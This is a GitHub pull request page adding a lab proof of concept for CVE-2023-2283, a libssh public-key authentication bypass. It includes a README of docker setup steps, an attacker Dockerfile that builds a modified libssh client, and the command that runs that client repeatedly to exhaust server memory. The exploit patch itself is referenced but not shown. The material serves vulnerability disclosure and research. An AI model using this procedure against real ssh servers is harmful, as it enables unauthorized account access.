-
Notifications
You must be signed in to change notification settings - Fork 264
PoC for libssh CVE-2023-2283 #763
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Merged
kevinbackhouse
merged 1 commit into
github:main
from
kevinbackhouse:libssh-pubkey-auth-bypass-CVE-2023-2283
Jun 7, 2023
Merged
Changes from all commits
Commits
File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
104 changes: 104 additions & 0 deletions
104
SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,104 @@ | ||
| # Public key authentication bypass in libssh (CVE-2023-2283) | ||
|
|
||
| [CVE-2023-2283](https://securitylab.github.com/advisories/GHSL-2023-085_libssh/) | ||
| is an authentication bypass vulnerability in | ||
| [libssh](https://www.libssh.org/), which, under certain conditions, may | ||
| enable a remote attacker to gain unauthorized access to another user’s | ||
| account via ssh login. | ||
|
|
||
| This demo uses docker to simulate two computers, named "libssh-server" | ||
| and "libssh-attacker". On libssh-server, we run `ssh_server_pthread`, | ||
| which is a simple ssh server application that is [included as an | ||
| example](https://gitlab.com/libssh/libssh-mirror/-/blob/e8322817a9e5aaef0698d779ddd467a209a85d85/examples/ssh_server.c) | ||
| with the libssh source code. The server is configured to allow public | ||
| key authentication with an ED25519 key, but the attacker does not know the | ||
| private key. The attacker instead authenticates by triggering the vulnerability. | ||
|
|
||
| The vulnerability is triggered when `ssh_server_pthread` hits an | ||
| out-of-memory condition at precisely the right moment. If libssh is | ||
| running on a 64-bit server with plenty of RAM then it is very unlikely | ||
| that an attacker will be able to generate enough memory pressure to | ||
| cause an out-of-memory error, which means that the vulnerability is | ||
| unlikely to be exploitable. The goal of this demo is, instead, to show | ||
| that the vulnerability is exploitable if libssh is running in a | ||
| memory-constrained environment such as a [memory-constrained | ||
| container](https://docs.docker.com/config/containers/resource_constraints/), | ||
| which we believe is a realistic scenario for a real-life libssh deployment. | ||
| The demo uses `ulimit` to set a 256MB memory limit on the ssh server. | ||
|
|
||
| ## Network setup | ||
|
|
||
| Create a docker network bridge, to simulate a network with two separate computers. | ||
|
|
||
| ``` | ||
| docker network create -d bridge --subnet 172.18.0.0/16 libssh-demo-network | ||
| ``` | ||
|
|
||
| ## Server setup | ||
|
|
||
| Build the docker image: | ||
|
|
||
| ``` | ||
| docker build server -t libssh-server --build-arg UID=`id -u` | ||
| ``` | ||
|
|
||
| Start the container: | ||
|
|
||
| ``` | ||
| docker run --rm --network libssh-demo-network --ip=172.18.0.10 -it libssh-server | ||
| ``` | ||
|
|
||
| If you want to be able to debug the libssh server, then you need to start the container with some extra command line arguments: | ||
|
|
||
| ``` | ||
| docker run --rm --network libssh-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-server | ||
| ``` | ||
|
|
||
| Inside the container, run these commands to create ssh keys for the server: | ||
|
|
||
| ``` | ||
| mkdir ~/testkeys | ||
| ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa | ||
| ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa | ||
| ``` | ||
|
|
||
| Start the server: | ||
|
|
||
| ``` | ||
| ulimit -v 262144 # 256MB | ||
| ~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0 | ||
| ``` | ||
|
|
||
| Note: ssh servers normally listen on port 22, but root privileges are required to listen on 22, so this demo uses port 2022 instead. Use `sudo` if you want to change the port number to 22. The `sudo` password in this docker container is "x". | ||
|
|
||
| ## Attacker setup | ||
|
|
||
| Build the docker image: | ||
|
|
||
| ``` | ||
| docker build attacker -t libssh-attacker --build-arg UID=`id -u` | ||
| ``` | ||
|
|
||
| Start the container: | ||
|
|
||
| ``` | ||
| docker run --rm --network libssh-demo-network --ip=172.18.0.11 -it libssh-attacker | ||
| ``` | ||
|
|
||
| If you want to be able to debug the client, then you need to start the container with some extra command line arguments: | ||
|
|
||
| ``` | ||
| docker run --rm --network libssh-demo-network --ip=172.18.0.11 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-attacker | ||
| ``` | ||
|
|
||
| The attacker uses a modified version of libssh. The modifications are in the file named `diff.txt` and are applied during the `docker build` step. | ||
|
|
||
| Run the malicious client like this: | ||
|
|
||
| ``` | ||
| ~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub | ||
| ``` | ||
|
|
||
| The vulnerability is triggered when the ssh server has an out-of-memory error at the exact right moment, which means that the PoC is unreliable. It runs in a loop until it's successful, which can often take several minutes. You may also need to run several instance of the PoC simultaneously to generate enough memory pressure on the server. I suggest using `tmux` to open three terminals and start 3 instances of the PoC. When one of the PoCs succeeds, it creates a file named "success.txt", which notifies the other instances that they should stop. | ||
|
|
||
| Note: the PoC sometimes accidentally triggers a SIGSEGV in the server due to an unrelated [null-pointer dereference bug](https://gitlab.com/libssh/libssh-mirror/-/merge_requests/381). If this happens, you will need to restart the `ssh_server_pthread` process. |
35 changes: 35 additions & 0 deletions
35
SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,35 @@ | ||
| FROM ubuntu:22.04 | ||
|
|
||
| ENV DEBIAN_FRONTEND=noninteractive | ||
|
|
||
| RUN apt-get update && \ | ||
| apt-get install -y \ | ||
| sudo tmux emacs git gdb cmake build-essential net-tools psmisc \ | ||
| libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg | ||
|
|
||
| ARG UID=1000 | ||
|
|
||
| # Create a non-root user account to run libssh. | ||
| RUN adduser attacker --disabled-password --uid $UID | ||
|
|
||
| # Grant the 'attacker' user sudo access. This is not used for the demo, | ||
| # but it is often handy for installing extra packages. | ||
| RUN adduser attacker sudo | ||
| RUN echo "attacker:x" | chpasswd | ||
| COPY home/ /home/attacker/ | ||
| RUN chown -R attacker:attacker /home/attacker | ||
|
|
||
| # Switch over to the 'attacker' user, since root access is no longer required | ||
| USER attacker | ||
| WORKDIR /home/attacker | ||
|
|
||
| # Clone and build libssh v0.10.4 | ||
| RUN git clone https://git.libssh.org/projects/libssh.git && \ | ||
| cd libssh && \ | ||
| git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \ | ||
| git apply ~/diff.txt && \ | ||
| mkdir build && cd build && \ | ||
| cmake .. && \ | ||
| make -j $(nproc) | ||
|
|
||
| USER attacker |
1 change: 1 addition & 0 deletions
1
SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| ~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub |
11 changes: 11 additions & 0 deletions
11
SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf
FB1F
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,11 @@ | ||
| # Enable 256 colors | ||
| set -g default-terminal "screen-256color" | ||
|
|
||
| # Enable using the mouse to switch windows. | ||
| set -g mouse on | ||
|
|
||
| # Don't lose track of SSH_AGENT etc. from parent environment. | ||
| set -g update-environment -r | ||
|
|
||
| # history buffer size | ||
| set-option -g history-limit 100000 | ||
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Do we need this?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It's not essential for the PoC, if that's what you mean! 🤣
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This
.tmux.conffile is part of my debugging setup. Makes it slightly more pleasant to debug inside a docker container. There's quite a few other remnants of my debugging setup that I've not removed from this PoC. For example, it's still littered with my debugprintfs. I decided to leave them in this time for that authentic feel. 🤣